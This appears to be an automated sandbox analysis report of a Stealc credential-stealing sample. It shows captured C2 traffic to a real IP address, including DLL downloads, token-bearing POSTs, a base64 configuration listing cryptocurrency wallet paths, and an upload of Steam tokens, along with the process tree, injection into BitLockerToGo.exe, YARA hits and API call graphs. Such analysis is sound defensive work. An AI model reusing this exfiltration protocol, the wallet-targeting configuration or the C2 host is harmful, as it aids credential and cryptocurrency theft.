                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                    Oct 21, 2024 08:47:31.836883068 CEST97OUTGET /3538548809da56b2/vcruntime140.dll HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:32.089154005 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:31 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                    ETag: "13bf0-5e7ea271b0900"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 80880
                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                    Oct 21, 2024 08:47:32.577593088 CEST201OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEB
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 1067
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:32.834055901 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:32 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=83
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:32.906239033 CEST467OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 267
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="message"wallets------GHDHJEBFBFHJECAKFCAA--
                                                                                                                                                    Oct 21, 2024 08:47:33.159900904 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:33 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Length: 2408
                                                                                                                                                    Keep-Alive: timeout=5, max=82
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                    Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                    Oct 21, 2024 08:47:33.162631989 CEST465OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFH
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 265
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="message"files------FBFCAKKKFBGDGCAKFCFH--
                                                                                                                                                    Oct 21, 2024 08:47:33.416014910 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:33 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=81
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:33.435915947 CEST563OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHI
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 363
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                    Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file"------KEHDBAEGIIIEBGCAAFHI--
                                                                                                                                                    Oct 21, 2024 08:47:33.690959930 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:33 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=80
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:33.791606903 CEST203OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 131659
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:34.664860010 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:33 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=79
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:34.711456060 CEST472OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEB
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 272
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"ybncbhylepme------JECGIIIDAKJDHJKFHIEB--
                                                                                                                                                    Oct 21, 2024 08:47:34.966022968 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:34 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=78
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:34.967072010 CEST472OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 272
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIJEGDBGDBFIJKECBAKF--
                                                                                                                                                    Oct 21, 2024 08:47:38.847279072 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:35 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=77
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:02:46:59
                                                                                                                                                    Start date:21/10/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe"
                                                                                                                                                    Imagebase:0xe70000
                                                                                                                                                    File size:15'184'384 bytes
                                                                                                                                                    MD5 hash:217E6AFF108174A9A90022C19F8E5F8F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1843071659.00000000023CA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1843071659.0000000002466000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1843071659.000000000232E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:02:47:09
                                                                                                                                                    Start date:21/10/2024
                                                                                                                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                    Imagebase:0x710000
                                                                                                                                                    File size:231'736 bytes
                                                                                                                                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:5.4%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:4%
                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                      Total number of Limit Nodes:38
                                                                                                                                                      execution_graph 64350 6c80c930 GetSystemInfo VirtualAlloc 64351 6c80c9a3 GetSystemInfo 64350->64351 64352 6c80c973 64350->64352 64354 6c80c9d0 64351->64354 64355 6c80c9b6 64351->64355 64366 6c82b320 5 API calls ___raise_securityfailure 64352->64366 64354->64352 64358 6c80c9d8 VirtualAlloc 64354->64358 64355->64354 64357 6c80c9bd 64355->64357 64356 6c80c99b 64357->64352 64359 6c80c9c1 VirtualFree 64357->64359 64360 6c80c9f0 64358->64360 64361 6c80c9ec 64358->64361 64359->64352 64367 6c82cbe8 GetCurrentProcess TerminateProcess 64360->64367 64361->64352 64366->64356 64368 6c82b9c0 64369 6c82b9c9 64368->64369 64370 6c82b9ce dllmain_dispatch 64368->64370 64372 6c82bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 64369->64372 64372->64370 64373 2751190 64380 27678e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 64373->64380 64375 275119e 64376 27511cc 64375->64376 64382 2767850 GetProcessHeap RtlAllocateHeap GetUserNameA 64375->64382 64378 27511b7 64378->64376 64379 27511c4 ExitProcess 64378->64379 64381 2767939 64380->64381 64381->64375 64383 27678c3 64382->64383 64383->64378 64384 6c82b694 64385 6c82b6a0 ___scrt_is_nonwritable_in_current_image 64384->64385 64414 6c82af2a 64385->64414 64387 6c82b6a7 64388 6c82b6d1 64387->64388 64389 6c82b796 64387->64389 64397 6c82b6ac ___scrt_is_nonwritable_in_current_image 64387->64397 64418 6c82b064 64388->64418 64431 6c82b1f7 IsProcessorFeaturePresent 64389->64431 64392 6c82b6e0 __RTC_Initialize 64392->64397 64421 6c82bf89 InitializeSListHead 64392->64421 64393 6c82b7b3 ___scrt_uninitialize_crt __RTC_Initialize 64395 6c82b6ee ___scrt_initialize_default_local_stdio_options 64400 6c82b6f3 _initterm_e 64395->64400 64396 6c82b79d ___scrt_is_nonwritable_in_current_image 64396->64393 64398 6c82b7d2 64396->64398 64399 6c82b828 64396->64399 64435 6c82b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 64398->64435 64401 6c82b1f7 ___scrt_fastfail 6 API calls 64399->64401 64400->64397 64403 6c82b708 64400->64403 64404 6c82b82f 64401->64404 64422 6c82b072 64403->64422 64409 6c82b83b 64404->64409 64410 6c82b86e dllmain_crt_process_detach 64404->64410 64405 6c82b7d7 64436 6c82bf95 __std_type_info_destroy_list 64405->64436 64408 6c82b70d 64408->64397 64411 6c82b711 _initterm 64408->64411 64412 6c82b860 dllmain_crt_process_attach 64409->64412 64413 6c82b840 64409->64413 64410->64413 64411->64397 64412->64413 64415 6c82af33 64414->64415 64437 6c82b341 IsProcessorFeaturePresent 64415->64437 64417 6c82af3f ___scrt_uninitialize_crt 64417->64387 64438 6c82af8b 64418->64438 64420 6c82b06b 64420->64392 64421->64395 64423 6c82b077 ___scrt_release_startup_lock 64422->64423 64424 6c82b082 64423->64424 64425 6c82b07b 64423->64425 64427 6c82b087 _configure_narrow_argv 64424->64427 64448 6c82b341 IsProcessorFeaturePresent 64425->64448 64429 6c82b092 64427->64429 64430 6c82b095 _initialize_narrow_environment 64427->64430 64428 6c82b080 64428->64408 64429->64408 64430->64428 64432 6c82b20c ___scrt_fastfail 64431->64432 64433 6c82b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 64432->64433 64434 6c82b302 ___scrt_fastfail 64433->64434 64434->64396 64435->64405 64436->64393 64437->64417 64439 6c82af9a 64438->64439 64440 6c82af9e 64438->64440 64439->64420 64441 6c82b028 64440->64441 64442 6c82afab ___scrt_release_startup_lock 64440->64442 64443 6c82b1f7 ___scrt_fastfail 6 API calls 64441->64443 64445 6c82afb8 _initialize_onexit_table 64442->64445 